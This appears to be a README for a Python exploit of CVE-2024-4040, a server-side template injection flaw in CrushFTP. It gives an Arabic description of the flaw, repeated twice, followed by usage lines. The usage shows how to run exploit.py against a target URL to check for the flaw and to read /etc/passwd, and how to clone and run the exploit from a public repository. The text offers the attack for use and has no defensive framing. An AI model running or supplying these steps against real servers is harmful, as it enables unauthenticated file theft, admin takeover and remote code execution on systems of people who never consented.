
ثغرة في حقن القوالب من جانب الخادم في CrushFTP في جميع الإصدارات قبل 10.7.1 و11.1.0 على جميع المنصات تسمح للمهاجمين غير المصادقين عن بُعد بقراءة ملفات من نظام الملفات خارج VFS Sandbox، وتجاوز المصادقة للحصول على صلاحيات إدارية، وتنفيذ تعليمات برمجية عن بُعد على الخادم.
استغلال Python لـ CVE-2024-4040
ثغرة حقن القالب من جانب الخادم في CrushFTP في جميع الإصدارات قبل 10.7.1 و 11.1.0 على جميع المنصات تسمح للمهاجمين عن بُعد غير الموثّقين بقراءة الملفات من نظام الملفات خارج VFS Sandbox، وتجاوز المصادقة للحصول على وصول إداري، وتنفيذ أكواد عن بُعد على الخادم.
-h --help Show this screen.
-t --target Specify target URL
-f --file Specify file to include
Only test if vulnerable: exploit.py -t http://10.10.1.23:8080
Include /etc/passwd: exploit.py -t http://10.10.1.23:8080 -f /etc/passwd
git clone https://github.com/1ncendium/CVE-2024-4040.git
cd CVE-2024-4040
python3 exploit.py -t http://target:8080